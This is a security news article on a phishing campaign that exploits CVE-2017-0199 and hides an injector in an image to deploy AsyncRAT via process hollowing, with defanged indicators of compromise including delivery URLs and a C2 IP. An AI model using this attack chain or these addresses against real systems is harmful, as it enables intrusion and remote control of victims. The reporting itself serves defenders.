Monday, May 12, 2025
Homecyber securityNew Steganography Campaign Exploits MS Office Vulnerability to Distribute AsyncRAT

New Steganography Campaign Exploits MS Office Vulnerability to Distribute AsyncRAT

Published on

SIEM as a Service

Follow Us on Google News

A recently uncovered cyberattack campaign has brought steganography back into the spotlight, showcasing the creative and insidious methods attackers employ to deliver malware.

This operation, dubbed the “Stego-Campaign,” exploits a known Microsoft Office vulnerability, CVE-2017-0199, to initiate infections and ultimately deploy the notorious AsyncRAT malware.

Innovative Attack Leverages Hidden Payloads in Images

The vulnerability, first reported in April 2017, enables remote code execution (RCE) without user interaction beyond opening a malicious document, making it a potent entry point for phishing-based attacks.

- Advertisement - Google News

The attack begins with a phishing email containing a malicious Microsoft Office document that exploits CVE-2017-0199.

AsyncRAT
Stego-Campaign flow

Once opened, the document triggers the download of a malicious HTA script, which in turn fetches a trojanized version of Prnport.vbs, a legitimate Windows script for managing printer ports.

This tampered script constructs and executes a PowerShell command to download an injector DLL hidden within an innocuous-looking image file using steganography.

Sophisticated Payload Delivery via Trojanized Scripts and Process Hollowing

The Base64-encoded injector is embedded between specific markers in the image’s source code and can be extracted and decoded using tools like CyberChef.

Analysis reveals the injector’s original namespace as Microsoft.Win32.TaskScheduler, a 32-bit DLL confirmed via tools like Detect It Easy and CFF Explorer.

The PowerShell script dynamically loads this injector via reflection, invoking a method named “VAI” to retrieve the final payload URL, which points to a reversed, Base64-encoded AsyncRAT binary.

The payload is decoded, and through a technique known as process hollowing (T1055.012), it is injected into a legitimate MSBuild.exe process, allowing the malware to run covertly under a trusted process name.

AsyncRAT
The process hollowing flow used in this attack

AsyncRAT, an open-source remote access tool released in 2019, provides attackers with capabilities like remote desktop access, keylogging, and the ability to deploy additional malware such as ransomware.

This campaign’s use of steganography to conceal malicious code within images exemplifies the lengths to which threat actors go to evade detection.

After invoking the VAI method, the PowerShell script reverses and decodes the payload URL, fetches the AsyncRAT binary, and employs process hollowing to execute it stealthily.

The final payload, flagged by VirusTotal, includes a configuration file revealing the command-and-control (C2) IP address, underscoring the sophisticated infrastructure behind the attack.

Steganography, while not commonly seen in the wild, remains a fascinating and dangerous technique that challenges traditional defense mechanisms, as the hidden payloads are difficult to detect without specialized analysis.

Defenders must familiarize themselves with such attack flows to mitigate similar threats effectively, focusing on phishing prevention, endpoint monitoring for suspicious process behavior, and anomaly detection in network traffic.

Indicators of Compromise (IOC)

TypeValue
Trojanized Prnport.vbs (SHA256)1105ae14ccb41fedcf556e4c575e34e505e9a571f2021ba89a75fbe5fa12e3c0
AsyncRAT Delivery URLhxxps[://]watchonlinehotvideos[.]site/001[.]txt
AsyncRAT (SHA256)448ae5b8890c17a2efe49856531efd62796db52d2ff0ecbb4678334aea2bf776
AsyncRAT C2 Address148[.]113[.]214[.]176
Injector Delivery URLhxxps[://]1019[.]filemail[.]com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb
Injector (Namespace)Microsoft.Win32.TaskScheduler
Injector Binary (SHA256)8CC93827CA7652AFC8E08B9266F6567D06B932AF26B601EB7FDE10F5E5A6CB30
Injected Process PathC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Open Source Linux Firewall IPFire 2.29 – Core Update 194 Released: What’s New!

IPFire, the powerful open-source firewall, has unveiled its latest release, IPFire 2.29 – Core...

Threat Actors Leverage DDoS Attacks as Smokescreens for Data Theft

Distributed Denial of Service (DDoS) attacks, once seen as crude tools for disruption wielded...

20-Year-Old Proxy Botnet Network Dismantled After Exploiting 1,000 Unpatched Devices Each Week

A 20-year-old criminal proxy network has been disrupted through a joint operation involving Lumen’s...

“PupkinStealer” – .NET Malware Steals Browser Data and Exfiltrates via Telegram

A new information-stealing malware dubbed “PupkinStealer” has emerged as a significant threat to individuals...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Open Source Linux Firewall IPFire 2.29 – Core Update 194 Released: What’s New!

IPFire, the powerful open-source firewall, has unveiled its latest release, IPFire 2.29 – Core...

Threat Actors Leverage DDoS Attacks as Smokescreens for Data Theft

Distributed Denial of Service (DDoS) attacks, once seen as crude tools for disruption wielded...

20-Year-Old Proxy Botnet Network Dismantled After Exploiting 1,000 Unpatched Devices Each Week

A 20-year-old criminal proxy network has been disrupted through a joint operation involving Lumen’s...